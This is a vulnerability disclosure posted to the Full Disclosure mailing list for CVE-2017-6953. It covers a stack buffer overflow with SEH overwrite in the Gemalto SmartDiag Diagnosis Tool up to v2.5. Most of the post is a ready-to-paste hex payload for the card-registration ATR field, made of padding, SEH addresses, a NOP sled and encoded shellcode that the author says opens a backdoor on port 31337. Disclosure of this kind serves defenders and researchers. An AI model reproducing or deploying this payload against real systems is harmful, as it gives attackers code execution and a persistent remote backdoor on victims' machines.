Gemalto SmartDiag Diagnosis Tool <= v2.5 - Buffer Overflow - SEH Overwrite - Code Execution

[Majid Alqabandi <majid () q8-host com>]

# Exploit Title: Gemalto SmartDiag Diagnosis Tool <= v2.5 - Buffer Overflow
- SEH Overwrite - Code Execution
# Date: 16-03-2017
# Software Link: http://support.gemalto.com/index.php?id=download_tools
# Exploit Author: Majid Alqabandi
# Contact: https://www.linkedin.com/in/majidalqabandi/
# CVE: CVE-2017-6953
# Category: Local - command execution - Buffer Overflow - SEH Overwrite.
# Vendor Notified: 17-04-2016


1. Description
SymDiag.exe is vulnerable to buffer overflow, SEH overwrite.
When trying to (Register a new card), Input fields are vulnerable to stack
overflow attack which leads to code execution and other possible security
threats.



2. Proof of Concept

The following PoC is provided code will:
- Exploit the vulnerability.
- Execute shell code.
- Create a backdoor on port 31337.

To exploit, start SmartDiag.exe tool, choose "Register a new card", on the
ATR use the following payload (Tested on Win7x64 & Win8x64 - SmartDiag
v2.5):

52834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000572b0410477f40008c214100f494400041ed40003b4140003552011078ab0110010000009cf2021000100000328b031040000000d02203100120400026e6400090909090e2f5001090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090ddc1d97424f4bbc4aa698a5833c9b15683e8fc3158140358d0489c7630055f87c076e962f1a48de7a378c5aa4ff28b5ec47604506d3c725f6ef0ba33ac92464ee0747681f575bffcf524688aa7d81dce7bd8f144c3a2749ab71876cb671630f30c70e102c162dd4d6e50954fa6a8567e8667694e0b79ad69f30cc5898e161ef3549283531f046065ccd3e369b990ac6d3c74c78ab57b081b8d5f8c4756c1952d39fec68ae65a8c39f3ddcf5530d0efa55e638397c1df0b948af9ccdba1be432249bf4ae11defe4c01d64f5edc82ba541a28b152212647cad4d947f67f892b153a974b06337ec3d85adfe6b1d593d4896fe3eba8a57a9f2c46fd602c3dc7baa8496976fb4a9bdc7bf92569dd151c6a2fb016b3060d1e2293f86a39c36425e86e070a35eca3078a3d5b90d9ff1a9cb20be9d8376684b6221da253c9eb4a1b9ec06b7c538f15777954468b8714111a4e1aec86c11e550c4baa00154a752fc9bded0f46325c87d61614e6e1bfa3b9088fb69AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA



3. Solution:
Vendor has been informed and confirmed the issue, no fix is available yet
from vendor.

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/